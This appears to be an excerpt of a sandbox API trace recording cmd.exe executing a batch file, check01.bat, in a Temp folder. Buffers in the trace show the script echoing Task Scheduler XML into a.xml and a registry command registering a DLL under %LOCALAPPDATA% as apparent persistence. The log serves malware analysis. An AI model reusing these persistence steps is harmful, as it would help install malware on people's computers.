[0378.138] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.138] GetProcessHeap () returned 0x200000
[0378.138] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.138] GetProcessHeap () returned 0x200000
[0378.138] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.139] GetProcessHeap () returned 0x200000
[0378.139] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.139] _tell (_FileHandle=3) returned 1442
[0378.139] _close (_FileHandle=3) returned 0
[0378.139] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.140] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.140] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.140] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.140] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.140] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.140] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.140] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.140] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.140] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.143] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.143] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.143] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.143] GetFileType (hFile=0x7) returned 0x2
[0378.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.145] _dup (_FileHandle=1) returned 3
[0378.145] _close (_FileHandle=1) returned 0
[0378.146] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.146] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.147] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.147] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.147] GetFileType (hFile=0x64) returned 0x1
[0378.147] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23e
[0378.147] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x23d
[0378.147] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.147] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.148] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21f4a0, Size=0x2c) returned 0x216db0
[0378.148] GetProcessHeap () returned 0x200000
[0378.148] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x216db0) returned 0x2c
[0378.148] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 15
[0378.148] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.148] GetFileType (hFile=0x64) returned 0x1
[0378.148] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 16
[0378.148] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0xf, lpOverlapped=0x0) returned 1
[0378.149] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.150] _close (_FileHandle=3) returned 0
[0378.151] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.151] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.152] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.152] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.152] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.153] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.153] SetConsoleInputExeNameW () returned 0x1
[0378.153] GetConsoleOutputCP () returned 0x1b5
[0378.154] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.154] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.154] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.154] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.154] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.154] SetFilePointer (in: hFile=0x64, lDistanceToMove=1442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5a2
[0378.155] GetProcessHeap () returned 0x200000
[0378.155] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216df0 | out: hHeap=0x200000) returned 1
[0378.155] GetProcessHeap () returned 0x200000
[0378.155] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216db0 | out: hHeap=0x200000) returned 1
[0378.155] GetProcessHeap () returned 0x200000
[0378.155] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.155] GetProcessHeap () returned 0x200000
[0378.155] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.155] GetProcessHeap () returned 0x200000
[0378.156] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.156] GetProcessHeap () returned 0x200000
[0378.156] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.156] GetProcessHeap () returned 0x200000
[0378.156] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.156] GetProcessHeap () returned 0x200000
[0378.156] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.157] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.157] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5a2
[0378.157] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x990, lpOverlapped=0x0) returned 1
[0378.157] SetFilePointer (in: hFile=0x64, lDistanceToMove=1494, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5d6
[0378.157] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=52, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n\n\ntemp%\\a.xml \r\n\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 52
[0378.157] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.158] GetFileType (hFile=0x64) returned 0x1
[0378.158] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.158] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5d6
[0378.158] GetProcessHeap () returned 0x200000
[0378.158] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.158] GetProcessHeap () returned 0x200000
[0378.158] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.158] GetProcessHeap () returned 0x200000
[0378.158] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x22) returned 0x21b0c0
[0378.158] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x9
[0378.158] GetProcessHeap () returned 0x200000
[0378.159] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.159] GetProcessHeap () returned 0x200000
[0378.159] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.159] GetProcessHeap () returned 0x200000
[0378.159] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.160] GetProcessHeap () returned 0x200000
[0378.160] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.160] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.160] GetProcessHeap () returned 0x200000
[0378.160] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.160] GetProcessHeap () returned 0x200000
[0378.160] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.160] GetProcessHeap () returned 0x200000
[0378.161] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.161] _tell (_FileHandle=3) returned 1494
[0378.161] _close (_FileHandle=3) returned 0
[0378.161] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.161] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.161] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.161] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.162] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.162] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.162] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.162] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.162] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.162] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.162] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.162] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.162] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.162] GetFileType (hFile=0x7) returned 0x2
[0378.163] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.163] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.164] _dup (_FileHandle=1) returned 3
[0378.164] _close (_FileHandle=1) returned 0
[0378.165] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.166] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.166] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.166] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.166] GetFileType (hFile=0x64) returned 0x1
[0378.166] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x24d
[0378.166] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x24c
[0378.166] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.167] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.167] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x231400, Size=0x48) returned 0x228690
[0378.167] GetProcessHeap () returned 0x200000
[0378.167] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x228690) returned 0x48
[0378.167] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 29
[0378.167] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.167] GetFileType (hFile=0x64) returned 0x1
[0378.167] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.167] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 30
[0378.168] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x1d, lpOverlapped=0x0) returned 1
[0378.168] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.169] _close (_FileHandle=3) returned 0
[0378.170] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.170] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.171] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.171] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.172] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.172] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.172] SetConsoleInputExeNameW () returned 0x1
[0378.173] GetConsoleOutputCP () returned 0x1b5
[0378.173] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.173] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.173] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.173] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.174] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.174] SetFilePointer (in: hFile=0x64, lDistanceToMove=1494, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5d6
[0378.174] GetProcessHeap () returned 0x200000
[0378.174] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f500 | out: hHeap=0x200000) returned 1
[0378.174] GetProcessHeap () returned 0x200000
[0378.174] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0378.174] GetProcessHeap () returned 0x200000
[0378.174] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.175] GetProcessHeap () returned 0x200000
[0378.175] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.175] GetProcessHeap () returned 0x200000
[0378.175] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.175] GetProcessHeap () returned 0x200000
[0378.175] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0378.175] GetProcessHeap () returned 0x200000
[0378.175] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.175] GetProcessHeap () returned 0x200000
[0378.175] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.175] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.176] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5d6
[0378.176] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x95c, lpOverlapped=0x0) returned 1
[0378.176] SetFilePointer (in: hFile=0x64, lDistanceToMove=1560, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x618
[0378.176] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^InteractiveToken^ >> %temp%\\a.xml\r\n", cbMultiByte=66, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^InteractiveToken^ >> %temp%\\a.xml\r\n\r\n\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 66
[0378.176] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.176] GetFileType (hFile=0x64) returned 0x1
[0378.176] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.176] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x618
[0378.177] GetProcessHeap () returned 0x200000
[0378.177] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.177] GetProcessHeap () returned 0x200000
[0378.177] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.177] GetProcessHeap () returned 0x200000
[0378.177] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.177] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.177] GetProcessHeap () returned 0x200000
[0378.177] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.177] GetProcessHeap () returned 0x200000
[0378.178] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.178] GetProcessHeap () returned 0x200000
[0378.178] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.179] _tell (_FileHandle=3) returned 1560
[0378.179] _close (_FileHandle=3) returned 0
[0378.179] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.179] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.179] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.179] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.179] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.179] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.179] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.179] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.179] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.179] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.180] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.180] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.180] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.180] GetFileType (hFile=0x7) returned 0x2
[0378.180] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.180] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.181] _dup (_FileHandle=1) returned 3
[0378.182] _close (_FileHandle=1) returned 0
[0378.183] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.183] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.183] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.183] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.183] GetFileType (hFile=0x64) returned 0x1
[0378.183] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x26a
[0378.183] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x269
[0378.184] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.184] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.184] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x66) returned 0x220470
[0378.184] GetProcessHeap () returned 0x200000
[0378.184] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x66
[0378.184] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="InteractiveToken \r\n") returned 42
[0378.184] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.184] GetFileType (hFile=0x64) returned 0x1
[0378.184] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.185] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="InteractiveToken \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InteractiveToken \r\n", lpUsedDefaultChar=0x0) returned 43
[0378.185] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x2a, lpOverlapped=0x0) returned 1
[0378.185] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.186] _close (_FileHandle=3) returned 0
[0378.187] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.187] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.188] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.188] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.188] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.188] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.189] SetConsoleInputExeNameW () returned 0x1
[0378.189] GetConsoleOutputCP () returned 0x1b5
[0378.189] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.190] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.190] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.190] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.190] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.190] SetFilePointer (in: hFile=0x64, lDistanceToMove=1560, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x618
[0378.190] GetProcessHeap () returned 0x200000
[0378.190] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2204f0 | out: hHeap=0x200000) returned 1
[0378.191] GetProcessHeap () returned 0x200000
[0378.191] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0378.191] GetProcessHeap () returned 0x200000
[0378.191] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.192] GetProcessHeap () returned 0x200000
[0378.192] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0378.192] GetProcessHeap () returned 0x200000
[0378.192] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.192] GetProcessHeap () returned 0x200000
[0378.192] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.192] GetProcessHeap () returned 0x200000
[0378.192] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.192] GetProcessHeap () returned 0x200000
[0378.192] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.193] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.193] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x618
[0378.193] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x91a, lpOverlapped=0x0) returned 1
[0378.193] SetFilePointer (in: hFile=0x64, lDistanceToMove=1597, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x63d
[0378.193] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=37, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nLogonType^> >> %temp%\\a.xml\r\n\r\n\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 37
